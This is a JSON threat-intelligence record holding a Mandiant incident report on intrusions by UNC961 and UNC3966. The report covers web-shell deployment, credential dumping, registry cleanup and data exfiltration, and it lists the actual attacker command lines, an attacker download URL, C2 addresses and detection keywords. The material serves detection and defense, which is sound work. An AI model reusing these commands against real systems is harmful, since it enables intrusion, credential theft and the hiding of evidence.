{
	"id": "88206e33-ad40-4cb0-8934-1a5844146f77",
	"created_at": "2026-04-06T00:11:58.572666Z",
	"updated_at": "2026-04-10T13:11:47.925322Z",
	"deleted_at": null,
	"sha1_hash": "4ccfa7f390952235e6b2597e67fd40f4fcf36c72",
	"title": "UNC961 in the Multiverse of Mandiant: Three Encounters with a Financially Motivated Threat Actor | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4996710,
	"plain_text": "UNC961 in the Multiverse of Mandiant: Three Encounters with a\r\nFinancially Motivated Threat Actor | Mandiant\r\nBy Mandiant\r\nPublished: 2023-03-23 · Archived: 2026-04-05 14:15:48 UTC\r\nWritten by: Ryan Tomcik, Rufus Brown, Josh Fleischer\r\nWeb application vulnerabilities are like doorways: you never know who or what will walk through. Between December\r\n2021 and July 2022, the Mandiant Managed Defense and Incident Response teams responded to three UNC961 intrusions at\r\ndifferent organizations that each started in similar fashion. Two of these victims were under the protection of Managed\r\nDefense, which identified and responded to the threat before significant impact occurred. In the third intrusion, the Mandiant\r\nIncident Response team was contacted after UNC961 had compromised the victim and transferred access to UNC3966.\r\nThis blog post covers the details and timeline of each intrusion conducted by UNC961, along with detection opportunities\r\nand examples of how Managed Defense’s proactive threat hunting, investigation, and response routinely limits the impact on\r\nour customers’ business and prevents their reality from being desecrated. Relevant MITRE ATT\u0026CK® tactics and technique\r\nIDs are included in this blog post to indicate the threat actors’ objectives at various points in the intrusions.\r\nAttribution and Targeting\r\nAcross the multiverse of threat actors, UNC961 is financially motivated and has primarily targeted victim organizations in\r\nNorth America since at least 2016. UNC961 is notable for quickly targeting vulnerable Internet-facing servers during\r\nperiods of vulnerability and exploit code disclosure. The threat group overlaps with multiple publicly reported threat\r\nclusters, including CrowdStrike's named group ProphetSpider. 
Mandiant first publicly reported on UNC961 in our blog post,\r\nForged in Fire: A Survey of MobileIron Log4Shell Exploitation, which details the threat group leveraging the Log4Shell\r\n(CVE-2021-44228) vulnerability for initial access. We believe some of the primary objectives of this group are to steal\r\nsensitive data from victims and provide access to ransomware-affiliated threat clusters.\r\nUNC961 takes a cost-effective approach to accessing each victim by leveraging publicly accessible exploit code from\r\nrecently disclosed vulnerabilities and weaponizing them for use. We have often observed UNC961 exploit popular Internet-facing application servers, including Atlassian Confluence (CVE-2021-26084), Citrix ADC (CVE-2019-19781), Oracle\r\nWebLogic (CVE-2020-14750), Gitlab (CVE-2021-22205) and others. After gaining access, UNC961 has commonly targeted\r\nand exfiltrated sensitive data, including network reconnaissance and credential information that could be sold or used in\r\nsupport of follow-on missions. In multiple instances, UNC961 intrusion activity has preceded the deployment of MAZE and\r\nEGREGOR ransomware from distinct follow-on actors.\r\nUniverse #1: I Am MobileIron Man\r\nIn our first incident, our story begins at Managed Defense. The lights are dim, and a brief message suddenly appears:\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 1 of 21\n\nFigure 1: Message captured in network egress traffic\r\nAt first glance, this somewhat innocuous message may disappear into the eternal din of warning messages we’ve come to\r\nexpect from using any piece of technology. 
However, to trained analysts, these few bytes egressing a network may be\r\nindicative of something more ominous under way.\r\nRed teamers, capture-the-flag enthusiasts, and APT actors alike are probably familiar with the following command:\r\nFigure 2: TCP bash reverse shell command\r\nThis simple, well-documented bash TCP reverse shell is often witnessed by Mandiant as the payload for many exploits\r\ntargeting UNIX-like hosts [MITRE ATT\u0026CK® Technique T1059.004]. Fortunately for us, establishing an interactive shell\r\nwithout an established TTY will cause the message bash: no job control in this shell to get sent from the victim’s\r\nhost to the attacker, providing an excellent detection opportunity.\r\nNow that we had a host in our sights, we began expanding our scope to include events preceding and following this activity.\r\nWe collected local application logs from the host around our timeframe of interest and started ripgrepping for keywords\r\n(such as the destination IP address) while scrutinizing the surrounding log entries. This ultimately revealed a\r\nMobileIron Core log entry that also fit the timeframe of our initial bash shell detection:\r\nFigure 3: MobileIron Core log entry\r\nThe string in the requesterName field told us that attackers had triggered CVE-2021-44228 by submitting the exploit into\r\nthe application’s web portal login. Since the goal of CVE-2021-44228 is to get this \"JNDI\" exploit string written to any log\r\nthat's processed by a vulnerable instance of Apache Log4j, the fact that this login attempt failed is irrelevant. The exploit still gets\r\nlogged, which spawned the reverse shell seen earlier.\r\nAttackers will commonly leverage various obfuscation techniques to increase the difficulty of detection and to stay one step\r\nahead of analysts. In this case, they substituted certain characters as nested strings. 
Let’s dig deeper into the exploit and\r\npayload:\r\nFigure 4: Obfuscated JNDI request\r\nIf we convert each nested statement into the character(s) listed at the end of each statement (after the colon and dash), we get\r\nthe following:\r\nFigure 5: Decoded JNDI request\r\nA quick search for “TomcatBypass” on github.com points us to the repository of a project named JNDI-Exploit. Perusing\r\nthis repo’s readme document, we can see several other familiar URI patterns, giving us a better idea of the attacker’s\r\ncapabilities with this tool and what each logged request is attempting to do (translated readme file).\r\nIn this case, the URI /TomcatBypass/Command/Base64/ simply enables an attacker to pass a Base64-encoded command to\r\nthe shell.\r\nDecoding the observed Base64 command in the exploit payload yields the following:\r\nThe first part of this command unsets the bash HISTFILE variable, which prevents the operating system from logging\r\nfuture commands. Next, the command establishes the basic reverse shell which resulted in our initial detection.\r\nDespite successfully establishing a bash shell, we observed multiple similar commands issued by UNC961, suggesting that\r\nthese exploits and payloads may have been repeatedly sent out across the Internet indiscriminately.\r\nUNC961 began their hands-on interaction with the host by issuing the ps -x command, listing all processes running under\r\nthe same owner. Realizing that multiple bash shells were running on the host (including some from other threat actors), our\r\nactor ran the kill -9 command along with numerous PIDs to end the other established shells on the host running under\r\nthe Tomcat process.\r\nFollowing this, UNC961 deployed their HOLEPUNCH tunneler utility to the host. 
HOLEPUNCH is a Windows \u0026 UNIX\r\nsource-compatible tunneler that uses SOCKS5 style commands wrapped in a custom outer structure to multiplex\r\nconnections back to its command and control (C2) server.\r\nUnfortunately for UNC961, these findings assisted the customer in remediating their vulnerable MobileIron infrastructure\r\nbefore any further compromise took place (Note: Ivanti, the parent company of MobileIron, published a permanent fix for\r\nApache Log4j vulnerabilities in the February 2022 release for Core 11.5.0.0).\r\nUniverse #2: Web (Shell) Slinger\r\nFigure 6: UNC961 CVE-2017-7504 compromise timeline\r\nIn our second incident, Managed Defense spotted UNC961 sticking with the theme of web application attacks when the\r\nthreat actor exploited a JBoss MQ Java Message Service (JMS) Deserialization vulnerability (CVE-2017-7504) on a\r\ncustomer’s Internet-exposed server [T1190]. The earliest evidence of compromise occurred when the threat actor generated\r\nan HTTP POST request to the URI /jbossmq-httpil/HTTPServerILServlet, which coincided with the execution of the\r\ncommand cmd.exe /c \"dir \u003e k.txt\" by the java.exe process.\r\nThree minutes later, the java.exe process executed a command to write a Base64-encoded PHP web shell to the server\r\n[T1505.003]. 
Next, the java.exe process executed a certutil command to decode the contents of the Base64-encoded web\r\nshell file k.txt to a web-accessible file k.jspx [T1140].\r\nParent: C:\\Java\\bin\\java.exe\r\nProcess: C:\\Windows\\System32\\cmd.exe\r\nCommands:\r\ncmd.exe /c \"echo \u003c2,212 Base64 characters\u003e \u003e k.txt\"\r\ncmd.exe /c \"certutil -f -decode ..\\server\\default\\deploy\\jms\\jbossmq-httpil.sar\\jbossmq-httpil.war\\k.txt ..\\server\\default\r\nFigure 7: Java process used to create an encoded web shell\r\nUNC961 then deployed a second web shell that Mandiant identified as a JSP-based web shell generated by the BLUEBEAM\r\nweb shell framework [T1505.003]. BLUEBEAM (aka Godzilla) is a publicly available web shell management tool written\r\nin Java that can generate web shell payloads in JSP, ASP.NET, and PHP. Mandiant has also observed BLUEBEAM web\r\nshell deployment following the exploitation of ProxyShell vulnerabilities on Microsoft Exchange Servers.\r\nPath: C:\\\u003cpath\u003e\\jboss-4.2.3.GA\\server\\default\\deploy\\jms\\jbossmq-httpil.sar\\jbossmq-httpil.war\r\nFile Name: httpil.jsp\r\nFigure 8: BLUEBEAM.JSP web shell\r\nOne month later, UNC961 came back to the httpil.jsp web shell and started to execute internal discovery commands that\r\nmanifested as child processes under the parent process java.exe. Examples of UNC961 discovery commands include using\r\nthe ping utility to test network connections [T1018], the net utility to enumerate permission groups [T1069.001, T1069.002],\r\nthe ipconfig utility to view local network configuration [T1016], the quser utility to view currently logged on users [T1033],\r\nand the dir command to view user account paths [T1083] (Figure 9). UNC961 performed nslookup commands for the\r\ndomain and subdomains of intensive[.]int and pinged the IP address 119.9.3[.]198. 
This domain and IP address are\r\nassociated with Rackspace DNS servers, which may indicate network connectivity testing.\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026quser\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026ipconfig /all\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026slookup intensive[.]int\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026nslookup intensive[.]int\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026nslookup ord.intensive[.]int\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026nslookup syd.intensive[.]int\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026ping -n 1 119.9.3[.]198\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026dir c:\\users\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026net user\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026nslookup \u003cadmin account\u003e /domain\" 2\u003e\u00261\r\nFigure 9: Commands executed through the web shell\r\nManaged Defense’s threat hunting team identified the commands executed through the web shell using multi-event correlation that\r\nmatched event sequences tagged under the MITRE ATT\u0026CK® Persistence and Discovery tactics. In this case, UNC961\r\nused their web shell [Persistence] to launch commands on the victim server that collected local network information\r\n[Discovery]. Mandiant uses multi-event correlation techniques, such as sequencing and clustering, for low-signal events that,\r\nwhen combined, can identify threat actor behaviors. 
The customer isolated the server, and the threat actor was eradicated\r\nfrom the environment before they could conduct further actions on their objectives.\r\nUniverse #3: Every Morning, The Same Nightmare\r\nIn our final incident, an organization first identified evidence of compromise when they detected a ransom note file\r\nHOW_DECRYPT.TXT related to CryptoDefense ransomware written to a file server 131 days after UNC961 gained initial\r\naccess to their environment. Mandiant’s Incident Response team was called in at that point to investigate and assist with\r\nevicting the threat actors from the customer’s environment. During the investigation, Mandiant identified evidence of an\r\naccess hand-off at day 63 between UNC961 and another threat actor Mandiant refers to as UNC3966, prior to data collection\r\nand exfiltration. UNC3966 collected data and performed exfiltration; however, despite a ransom note referencing\r\nCryptoDefense, the threat actor didn’t appear to run an encryptor.\r\nFigure 10: Initial UNC961 access with HOLERUN and MUTEPUT deployment\r\nUNC961 gained an initial foothold on a compromised Windows 2008 server and deployed HOLERUN and MUTEPUT\r\nmalware as a Windows Service [T1543.003] before going relatively dormant for two months. HOLERUN is a Windows\r\nutility written in C that functions similarly to Runas and can be used to create processes and run commands under specified\r\nusers with their corresponding privileges. MUTEPUT is a backdoor that supports file download, file upload, and arbitrary\r\ncommand execution. 
During the period of low activity, UNC961 used the WGET utility to download additional malware and\r\ntools [T1105], including the PSCP file transfer utility, 7-Zip file archiver, the TxPortMap port scanner, and a SOCKS proxy\r\nutility.\r\nAround two months after the initial compromise, there was an access hand-off event between UNC961 and UNC3966.\r\nMandiant identified a HOLERUN utility installation by UNC961 followed by the deployment of the BARNWORK\r\nbackdoor for UNC3966 approximately 26 minutes later. BARNWORK is a backdoor written in C++ that communicates\r\nusing a custom binary protocol.\r\nFigure 11: Handoff between UNC961 and UNC3966\r\nAfter receiving access, UNC3966 moved laterally through the environment over Remote Desktop Protocol (RDP)\r\n[T1021.001] using a compromised domain administrator account [T1078.002] and installed the BARNWORK backdoor and\r\nLIGHTBUNNY tunneler malware as Scheduled Tasks [T1053.005]. LIGHTBUNNY is a client component of a tunneler\r\nwritten in C that wraps a custom protocol over SOCKS. UNC3966 also used Windows Background Intelligent Transfer\r\nService (BITS) jobs [T1197] to download additional payloads hosted on their infrastructure [T1105].\r\nFigure 12: LIGHTBUNNY deployment and BITS download jobs\r\nUNC3966 performed internal host discovery [T1018] using the ping and nslookup utilities and collected system information\r\n[T1082] using the Windows Management Instrumentation Command-line utility wmic.exe [T1047]. 
To cover their tracks,\r\nUNC3966 ran multiple reg.exe commands to delete Registry keys containing information related to file searching, terminal\r\nservices remote desktop activity, and application launch activity [T1112, T1070.007].\r\nFigure 13: Indicator removal and discovery commands\r\nInterestingly, UNC961 reappeared post-handoff on day 116 to install a TURNSIGN tunneler on a new system. TURNSIGN\r\nis a tunneler that establishes a simple SOCKS5 server and creates an encrypted tunnel between the sample and a hard-coded\r\nC2.\r\nFigure 14: UNC961 deployment of TURNSIGN\r\nUNC3966 used the 7-zip archive utility to compress data related to Contracts and Accounting information that was stored on\r\na network attached storage (NAS) device [T1560.001] and transferred the data over SSH protocol [T1048] to threat actor-controlled IP addresses using the WinSCP utility.\r\nFigure 15: 7-zip file archival and exfiltration via WinSCP\r\nOn day 143, twelve days after the exfiltration activity, UNC3966 returned to the environment and executed a series of\r\ndiscovery commands to collect information related to the system, users, permission groups, and domain trusts [T1069.002,\r\nT1482, T1082, T1033]. 
UNC3966 downloaded additional tools from the file sharing website file[.]io to a domain controller,\r\nincluding a version of the Invoke-ShareFinder PowerShell script that was used to enumerate network shares.\r\nFigure 16: UNC3966 discovery commands and ShareFinder usage\r\nTo harvest additional account credentials, UNC3966 used the Task Manager application to dump LSASS memory on\r\nmultiple systems [T1003.001] and uploaded the dump files to the file sharing website dropmefiles[.]com [T1567]. The threat\r\nactor also created a new domain user account [T1136.002] and added it to the Domain Admins permissions group [T1098] to\r\nhave an independent account for privileged command execution and expanded access to the environment.\r\nFigure 17: LSASS process dump and new domain admin account creation\r\nTo perform additional network reconnaissance, UNC3966 leveraged the ADFind utility to collect Active Directory\r\ninformation [T1016, T1018, T1069.002, T1482, T1087.002]. 
Mandiant identified evidence of credential access activities\r\nleveraging Mimikatz DCSync [T1003.006] and the Windows Active Directory utility Ntdsutil to dump the Active Directory\r\ndatabase ntds.dit [T1003.003] and the SYSTEM and SECURITY registry hives on a domain controller.\r\nFigure 18: ADFind execution and NTDS Active Directory dump\r\nMandiant worked with the customer to harden the environment and limit the impact of a potential ransomware deployment.\r\nThe customer responded swiftly enough to prevent ransomware encryption in the environment, but the extent of the\r\ncompromise necessitated a lengthy remediation process, including rebuilding infected systems, scoping sensitive data access\r\nand lateral movement by the threat actor during their months of access, and coordinating and performing an enterprise-wide\r\npassword reset. During the eradication period, Mandiant helped the customer prepare responses for possible extortion or\r\nransom scenarios. UNC961 and UNC3966’s access was revoked and the customer finally put this nightmare to rest.\r\nOutlook and Implications\r\nIn a multiverse full of threat actors, UNC961 is resourceful and opportunistic in its approach to initial access operations. The\r\nthreat group employs a cost-effective approach to achieve initial access by exploiting recently disclosed vulnerabilities using\r\npublicly available exploit code. This differs from other common initial intrusion vectors, such as phishing, and is\r\nindiscriminate by nature, which can provide UNC961 with numerous successful intrusions.\r\nAny organization can find themselves targeted by threat actors like UNC961 but can count on Mandiant’s Managed\r\nDetection \u0026 Response (MDR) and threat hunting services for protection. 
Proactive discovery of external assets using Attack\r\nSurface Management can also help identify vulnerabilities, misconfigurations, and other exposures that could provide a\r\ndoorway to threat actors.\r\nDetection Opportunities\r\n\r\nDetection Opportunity: Web server process echo Base64-encoded string\r\nMITRE ATT\u0026CK® Technique: T1505.003\r\nEvent Details:\r\nParent Process: java.exe\r\nCommand(s):\r\ncmd.exe /c \"echo \u003c2,212 Base64 characters\u003e \u003e k.txt\"\r\n\r\nDetection Opportunity: Web server process launching discovery commands\r\nMITRE ATT\u0026CK® Technique: T1505.003, T1083, T1018, T1069.001, T1069.002, T1016, T1033, T1049\r\nEvent Details:\r\nParent Process: java.exe\r\nCommand(s):\r\ncmd.exe /c \"dir \u003e k.txt\"\r\nquser 2\u003e\u00261\r\nipconfig /all 2\u003e\u00261\r\nnslookup intensive[.]int 2\u003e\u00261\r\nnslookup ord.intensive[.]int 2\u003e\u00261\r\nnslookup syd.intensive[.]int 2\u003e\u00261\r\nping -n 1 119.9.3[.]198 2\u003e\u00261\r\ndir c:\\users 2\u003e\u00261\r\nnet user 2\u003e\u00261\r\nnslookup /domain 2\u003e\u00261\r\n\r\nDetection Opportunity: Web shell deployment using certutil to decode payload\r\nMITRE ATT\u0026CK® Technique: T1505.003, T1140\r\nEvent Details:\r\nParent Process: java.exe\r\nCommands:\r\ncmd.exe /c \"certutil -f -decode ..\\server\\default\\deploy\\jms\\jbossmq-httpil.sar\\jbossmq-httpil.w\r\n..\\server\\default\\deploy\\jms\\jbossmq-httpil.sar\\jbossmq-httpil.war\\k.jspx\"\r\n\r\nDetection Opportunity: Message generated across network traffic when establishing an interactive shell without an established TTY\r\nMITRE ATT\u0026CK® Technique: T1059.004\r\nEvent Details:\r\nString: bash: no job control in this shell\r\n\r\nDetection Opportunity: Suspicious Windows Service creation events\r\nMITRE ATT\u0026CK® Technique: T1543.003\r\n\r\nDetection Opportunity: Suspicious Windows Scheduled Task creation events\r\nMITRE ATT\u0026CK® Technique: T1053.005\r\nEvent Details:\r\nLIGHTBUNNY Task Name: MKSAuth\r\nProgram Path: C:\\Users\\Administrator\\AppData\\Local\\Temp\\vmtoolsd.exe\r\nLIGHTBUNNY Task Name: MKS Update Tools\r\nProgram Path: C:\\MKS\\mksnt\\mks.exe\r\nBARNWORK Task Name: MKSAuth\r\nProgram Path: C:\\Windows\\System32\\mksauth.exe\r\n\r\nDetection Opportunity: Suspicious BITS transfer jobs\r\nMITRE ATT\u0026CK® Technique: T1105, T1197\r\nEvent Details:\r\nLog: Microsoft-Windows-Bits-Client/Operational\r\nEID: 59\r\nMessages:\r\nBITS started the myjob transfer job that is associated with the https[:]//ms-prod19-live[.]com/rehjhj8785780923853/abc URL.\r\nBITS started the myjob transfer job that is associated with the https[:]//ms-prod19-live[.]com/rehjhj8785780923853/cdef URL.\r\n\r\nDetection Opportunity: Suspicious WGET file download activity\r\nMITRE ATT\u0026CK® Technique: T1105\r\nEvent Details:\r\nUser-Agent: Wget/1.11.4\r\nURLs:\r\n/7z.bin\r\n/pscp.bin\r\n/333.bmp\r\n/333.bpm\r\n/auditd64.bin\r\n/TxPortMap.bin\r\n\r\nDetection Opportunity: Indicator removal from Windows Registry\r\nMITRE ATT\u0026CK® Technique: T1112, T1070.007\r\nEvent Details:\r\nProcess: reg.exe\r\nCommand Line:\r\nreg  delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /v\r\nreg  delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f\r\nreg  add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"\r\nattrib  C:\\Users\\TEMP\\documents\\Default.rdp -s -h\r\nreg  delete \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedP /va /f\r\nreg  delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WordWhee /va /f\r\nreg  delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f\r\n\r\nDetection Opportunity: System information collection using the Windows Management Instrumentation Command-line utility wmic.exe\r\nMITRE ATT\u0026CK® Technique: T1047\r\nEvent Details:\r\nCommand Line examples:\r\nwmic  /node:\"10.0.0.1\" logicaldisk get deviceid,drivetype,filesystem,freespace,size,volumenam\r\nwmic  /node:\"10.0.0.2\" logicaldisk get deviceid,drivetype,filesystem,freespace,size,volumenam\r\n…\r\nwmic  /node:\"10.0.0.72\" logicaldisk get deviceid,drivetype,filesystem,freespace,size,volumena\r\n\r\nDetection Opportunity: Execution and removal of PsExec Service\r\nMITRE ATT\u0026CK® Technique: T1569.002, T1070, T1543.003\r\nEvent Details:\r\nLog: System\r\nEID: 7045\r\nMessage:\r\nA service was installed in the system.\r\nService Name:  PSEXESVC\r\nService File Name:  %SystemRoot%\\PSEXESVC.exe\r\nService Type:  user mode service\r\nService Start Type:  demand start\r\nService Account:  LocalSystem\r\n--\r\nParent Process: C:\\Windows\\System32\\cmd.exe\r\nProcess: C:\\MKS\\bin\\PsExec.exe\r\nCommand Line:\r\npsexec -s cmd\r\n--\r\nProcess: sc.exe\r\nCommand Line:\r\nsc delete psexesvc\r\n\r\nDetection Opportunity: 7-zip execution to create archive with remote share or keywords of interest on command line\r\nMITRE ATT\u0026CK® Technique: T1560.001\r\nEvent Details:\r\nCommand Line Examples:\r\n\"\u003cpath\u003e\\7zG.exe\" a -i#7zMap5172:94:7zEvent7590 -ad -saa -- \"\\\\10.0.0.1\\nasdevice\\Path\\Accounting\"\r\n\"\u003cpath\u003e\\tmp\\7\\App\\7-Zip64\\7zG.exe\" a -i#7zMap21824:98:7zEvent2463 -ad -saa -- \"\\\\10.0.0.1\\nasdevice\\Path\\Contracts\"\r\n\r\nDetection Opportunity: Spike (\u003e 1GB) in outbound SSH byte transfer activity to remote IP addresses\r\nMITRE ATT\u0026CK® Technique: T1048, T1071.002, T1021.004\r\nEvent Details:\r\nWinSCP connections to 104.149.170[.]183:22 and 23.227.203[.]214:22\r\n\r\nDetection Opportunity: Execution of PowerShell by BARNWORK backdoor\r\nMITRE ATT\u0026CK® Technique: T1059.001\r\nEvent Details:\r\nParent Process: C:\\MKS\\bin\\mks.exe\r\nProcess: powershell.exe\r\nCommand Line:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Set-ExecutionPolicy RemoteSigned -Scope Process -Force -Confirm:$false;$PSDefaultParameterValues = @{'Ou\r\nFile:Encoding' = 'utf8'}; \" C:\\Windows\\TEMP\\CWwaKhefO.ps1\" | Out-File -encoding UTF8 \"C:\\Windows\\TEMP\\\\bAbiTGhY.txt\"\r\n\r\nDetection Opportunity: LIGHTBUNNY execution by Windows Command Shell\r\nMITRE ATT\u0026CK® Technique: T1059.003, T1572\r\nEvent Details:\r\nParent Process: C:\\Windows\\System32\\cmd.exe\r\nProcess: C:\\Users\\Administrator\\AppData\\Local\\Temp\\vmtools.exe\r\nCommand Line:\r\n\"C:\\Windows\\system32\\cmd.exe\"  /c \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\vmtools.e\r\n37.1.209[.]20 443\"\r\n\r\nDetection Opportunity: ShareFinder PowerShell script execution and Script Block Logging keywords\r\nMITRE ATT\u0026CK® Technique: T1059.001, T1135\r\nEvent Details:\r\nFile Name: SF.ps1\r\nOutput File Names:\r\nsh.txt\r\nshda.txt\r\n--\r\nLog: Microsoft-Windows-PowerShell/Operational\r\nEID: 4104\r\nMessage example:\r\n#requires -version 2\r\nImplementation of Sharefinder that utilizes https://github.com/mattifestation/psreflect to stay off of d\r\nBy @harmj0y\r\nMessage Keyword Examples:\r\nSharefinder\r\nNew-InMemoryModule\r\nmattifestation\r\nharmj0y\r\nInvoke-ShareFinder\r\n\r\nDetection Opportunity: LSASS process memory dumped by Task Manager\r\nMITRE ATT\u0026CK® Technique: T1003.001\r\nEvent Details:\r\nProcess: C:\\Windows\\System32\\Taskmgr.exe\r\nFile Write:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\lsass.DMP\r\n\r\nDetection Opportunity: Command to launch PowerShell from a specific directory\r\nMITRE ATT\u0026CK® Technique: T1059.001\r\nEvent Details:\r\nProcess Command Line:\r\nPowerShell.exe -noexit -command Set-Location -literalPath 'C:\\ProgramData'\r\n\r\nDetection Opportunity: ADFind reconnaissance\r\nMITRE ATT\u0026CK® Technique: T1016, T1018, T1069.002, T1482, T1087.002\r\nEvent Details:\r\nCommand Line Examples:\r\nC:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\\u003cuser\u003e\\Downloads\\ADfind\\backup.bat\" \"\r\nadfind.exe  -f \"(objectcategory=group)\"\r\nadfind.exe  -f \"(objectcategory=organizationalUnit)\"\r\nadfind.exe  -f \"(objectcategory=person)\"\r\nadfind.exe  -f \"objectcategory=computer\"\r\nadfind.exe  -gcb -sc trustdmp\r\nadfind.exe  -sc trustdmp\r\nadfind.exe  -subnets -f (objectCategory=subnet)\r\n\r\nDetection Opportunity: Suspicious ntdsutil.exe execution and file writes\r\nMITRE ATT\u0026CK® Technique: T1003.003\r\nEvent Details:\r\nProcess: ntdsutil.exe\r\nFiles Created:\r\nC:\\temp\\Active Directory\\ntds.dit\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\tmp.edb\r\nC:\\temp\\registry\\SECURITY\r\nC:\\temp\\registry\\SYSTEM\r\n\r\nIndicators of Compromise\r\nType Value Attribution Description\r\nMD5 c55f4b123c645f9c5a1d00205ab2e61e UNC3966 LIGHTBUNNY tunneler\r\nMD5 31c49b87463f4e4ce6ae4c442319d3a2 UNC961 HOLERUN\r\nIP 104.149.170[.]183 UNC3966 WinSCP\r\nIP 23.227.203[.]214 UNC3966 WinSCP\r\nIP 37.1.209[.]20 UNC3966 Command and Control\r\nIP 107.181.187[.]184 UNC961 Command and Control\r\nIP 45.61.136[.]39 UNC961 Command and Control\r\nIP 209.141.61[.]225 UNC961 Command and Control\r\nIP 107.181.187[.]182 UNC961 Command and Control\r\nIP 136.244.69[.]29 UNC961 Exploitation\r\nIP 5.149.250[.]214 UNC961 Web shell Interaction\r\nURL https[:]//ms-prod19-live[.]com/rehjhj8785780923853/abc UNC3966 Download\r\nURL https[:]//ms-prod19-live[.]com/rehjhj8785780923853/cdef UNC3966 Download\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA100-299 Active Directory - ADFIND.EXE, Enumeration\r\nA105-181 Host CLI - Secret Dumps with Ntdsutil\r\nA100-879 Malicious File Transfer - ADFIND.EXE, Download\r\nA101-172 Active Directory - ADFIND.EXE, User Query\r\nA101-170 Active Directory - ADFIND.EXE, Organizational Units Query\r\nA101-168 Active Directory - ADFIND.EXE, Domain Trust Query\r\nA101-167 Active Directory - ADFIND.EXE, Computer Query\r\nA101-169 Active Directory - ADFIND.EXE, Group Query\r\nA106-034 Host CLI - POWERVIEW, ShareFinder, Execution, Variant#1\r\nA106-033 Application Vulnerability - UNC961, CVE-2021-44228, HTTP GET, LDAP Callback via URI Path\r\nA106-030 Malicious File Transfer - UNC961, TURNSIGN, Download, Variant #1\r\nA106-029 
Malicious File Transfer - UNC961, MUTEPUT, Download, Variant #1\r\nA106-028 Malicious File Transfer - UNC961, BLUEBEAM.JSP, Download, Variant #1\r\nA106-027 Application Vulnerability - CVE-2017-7504, Exploitation\r\nA106-026 Protected Theater - UNC3966, LIGHTBUNNY, Execution, Variant #1\r\nA106-025 Malicious File Transfer - UNC3966, LIGHTBUNNY, Download, Variant #1\r\nA106-024 Malicious File Transfer - UNC961, HOLERUN, Download, Variant #1\r\nA106-023 Command and Control - Bash Non Interactive Reverse Shell\r\nA105-179 Host CLI - MIMIKATZ (2.2.0), DCSync, Variant #1\r\nAcknowledgements\r\nA big ‘thank you 3000’ to Tim Martin, threat hunting lead for Managed Defense, for collaborating on the initial idea and\r\ncontributing technical and comical insights. Special thanks to Tommy Dacanay and Foti Castelan for their marvelous\r\ntechnical review and information sharing that helped shape the multiverse. A cosmic high-five to the FLARE analysts who\r\nanalyzed UNC961 and UNC3966 payloads referenced in this blog post: Matt Williams, Muhammad Umair, Jay Smith, and\r\nJosh Homan. And a tip of the helmet to Matthew Hoerger for assembling Mandiant Security Validation (MSV) Actions and\r\nAna Foreman for the graphics.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated"
	],
	"report_names": [
		"unc961-multiverse-financially-motivated"
	],
	"threat_actors": [
		{
			"id": "056826cb-6e17-4954-a9b4-2cc8c6ae3cb8",
			"created_at": "2023-03-04T02:01:54.115678Z",
			"updated_at": "2026-04-10T02:00:03.360898Z",
			"deleted_at": null,
			"main_name": "Prophet Spider",
			"aliases": [
				"GOLD MELODY",
				"UNC961"
			],
			"source_name": "MISPGALAXY:Prophet Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "47b52642-e5b8-4502-b714-b625002d86aa",
			"created_at": "2024-06-19T02:03:08.086579Z",
			"updated_at": "2026-04-10T02:00:03.812509Z",
			"deleted_at": null,
			"main_name": "GOLD MELODY",
			"aliases": [
				"PROPHET SPIDER",
				"UNC961"
			],
			"source_name": "Secureworks:GOLD MELODY",
			"tools": [
				"7-Zip",
				"AUDITUNNEL",
				"BURP Suite",
				"GOTROJ",
				"JSP webshells",
				"Mimikatz",
				"Wget"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434318,
	"ts_updated_at": 1775826707,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
